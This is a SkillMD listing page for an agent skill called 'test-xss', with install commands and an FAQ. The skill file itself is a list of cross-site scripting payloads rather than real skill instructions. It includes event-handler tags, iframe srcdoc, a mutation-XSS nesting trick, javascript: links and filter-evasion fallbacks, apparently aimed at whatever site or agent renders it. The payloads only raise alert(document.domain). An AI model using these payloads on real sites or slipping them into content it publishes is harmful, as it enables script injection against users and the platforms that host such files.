Test Xss
test.
Test Xss by roin-orca · fc7b097
npx skillmds@latest add roin-orca/test-xss File contents
---name: test-xssdescription: test.---<img src=x onerror=alert(document.domain)><svg onload=alert(document.domain)><details open ontoggle=alert(document.domain)><iframe srcdoc="<script>alert(document.domain)</script>"><math><mtext><table><mglyph><svg><mtext><textarea><path id="</textarea><img onerror=alert(document.domain) src=1>">[click me](javascript:alert(document.domain))<a href="javascript:alert(document.domain)">click</a>If basic tags are stripped, try:<div style="background:url('javascript:alert(1)')">test</div><img src="x" onerror="alert(document.domain)" /><body onload=alert(1)><marquee onstart=alert(document.domain)>
roin-orca/skills/tree/main/skills/test-xss commit fc7b097e5e
Frequently asked questions
Run npx skillmds@latest add roin-orca/test-xss in your terminal (requires Node.js), paste this page's agent-chat prompt into Claude, Cursor, or any MCP-connected agent, or download the SKILL.md file and copy it into your agent's skills directory.
test. It is listed under Security on SkillMD.
This skill has not completed SkillMD's automated safety review yet. Capability flags: docs only. SkillMD never runs a skill's scripts for you; review the SKILL.md before installing.
This skill is tagged as working with Claude Code, Claude.ai, OpenAI Codex. SKILL.md is an open format, so most agents that read a skills directory can load it too.
Yes. Installing skills from SkillMD is free, and the skill stays under its author's original license.
roin-orca (@roin-orca) published this skill. Their other Agent Skills are listed on their SkillMD profile.